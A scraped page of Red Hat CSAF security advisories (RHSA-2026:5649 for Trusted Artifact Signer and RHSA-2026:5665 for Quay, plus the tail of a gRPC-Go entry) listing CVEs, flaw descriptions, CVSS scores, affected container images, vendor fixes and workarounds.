"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449833"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "RHBZ#2449833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
"url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
}
],
"release_date": "2026-03-20T22:23:32.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
}
]
}
RHSA-2026:5649
Vulnerability from csaf_redhat - Published: 2026-03-24 16:17 - Updated: 2026-04-12 20:01Summary
Red Hat Security Advisory: RHTAS 1.3.2 - Red Hat Trusted Artifact Signer Release
Severity
Important
Notes
Topic: The 1.3.2 release of Red Hat Trusted Artifact Signer OpenShift Operator.
For more details please visit the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3
Details: The RHTAS Operator can be used with OpenShift Container Platform 4.16, 4.17, 4.18, 4.19 and 4.20
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Vendor Fix
Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev
Platform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization's software supply chain.
For details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3
You can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index
https://access.redhat.com/errata/RHSA-2026:5649
Workaround
Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.
A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.
9.1 (Critical)
Vendor Fix
Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev
Platform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization's software supply chain.
For details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3
You can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index
https://access.redhat.com/errata/RHSA-2026:5649
References
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.3.2 release of Red Hat Trusted Artifact Signer OpenShift Operator.\nFor more details please visit the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3",
"title": "Topic"
},
{
"category": "general",
"text": "The RHTAS Operator can be used with OpenShift Container Platform 4.16, 4.17, 4.18, 4.19 and 4.20",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:5649",
"url": "https://access.redhat.com/errata/RHSA-2026:5649"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27606",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_5649.json"
}
],
"title": "Red Hat Security Advisory: RHTAS 1.3.2 - Red Hat Trusted Artifact Signer Release",
"tracking": {
"current_release_date": "2026-04-12T20:01:01+00:00",
"generator": {
"date": "2026-04-12T20:01:01+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:5649",
"initial_release_date": "2026-03-24T16:17:51+00:00",
"revision_history": [
{
"date": "2026-03-24T16:17:51+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-03-24T16:18:03+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-12T20:01:01+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Trusted Artifact Signer 1.3",
"product": {
"name": "Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:trusted_artifact_signer:1.3::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Trusted Artifact Signer"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"product_id": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhtas-console-rhel9@sha256%3A7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399?arch=amd64\u0026repository_url=registry.redhat.io/rhtas\u0026tag=1774254230"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"product": {
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"product_id": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rhtas-console-ui-rhel9@sha256%3Ad23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb?arch=amd64\u0026repository_url=registry.redhat.io/rhtas\u0026tag=1773934794"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64 as a component of Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64 as a component of Red Hat Trusted Artifact Signer 1.3",
"product_id": "Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
},
"product_reference": "registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64",
"relates_to_product_reference": "Red Hat Trusted Artifact Signer 1.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T16:17:51+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5649"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2026-27606",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2026-02-25T04:01:24.449922+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
],
"known_not_affected": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T16:17:51+00:00",
"details": "Red Hat Trusted Artifact Signer simplifies cryptographic signing and verifying of software artifacts such as container images, binaries and source code changes. It is a self-managed on-premise deployment of the Sigstore project available at https://sigstore.dev\n\nPlatform Engineers, Software Developers and Security Professionals may use RHTAS to ensure the integrity, transparency and assurance of their organization\u0027s software supply chain.\n\nFor details on using the operator, refer to the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3\n\nYou can find the release notes for this version of Red Hat Trusted Artifact Signer at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.3/html-single/release_notes/index",
"product_ids": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5649"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-rhel9@sha256:7f9dcc3503ef31563733eb925c6c15ce0d945069f1369692456c49361c60a399_amd64",
"Red Hat Trusted Artifact Signer 1.3:registry.redhat.io/rhtas/rhtas-console-ui-rhel9@sha256:d23bf73126fb5c18ff24369bb05c7adb03e9f3fefdbb49795b8aeb3d7c223cdb_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
}
]
}
RHSA-2026:5665
Vulnerability from csaf_redhat - Published: 2026-03-24 18:02 - Updated: 2026-04-12 20:00Summary
Red Hat Security Advisory: Red Hat Quay 3.10.19
Severity
Important
Notes
Topic: Red Hat Quay 3.10.19 is now available with bug fixes.
Details: Quay 3.10.19
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.
A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.
7.4 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
7.5 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
A flaw was found the Pillow Python imaging library. Providing a specially crafted PSD image may lead to an out-of-bounds write. This could potentially allow for arbitrary code execution or information disclosure.
7.3 (High)
Vendor Fix
Before applying this update, make sure all previously released errata relevant
to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
https://access.redhat.com/errata/RHSA-2026:5665
Workaround
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.
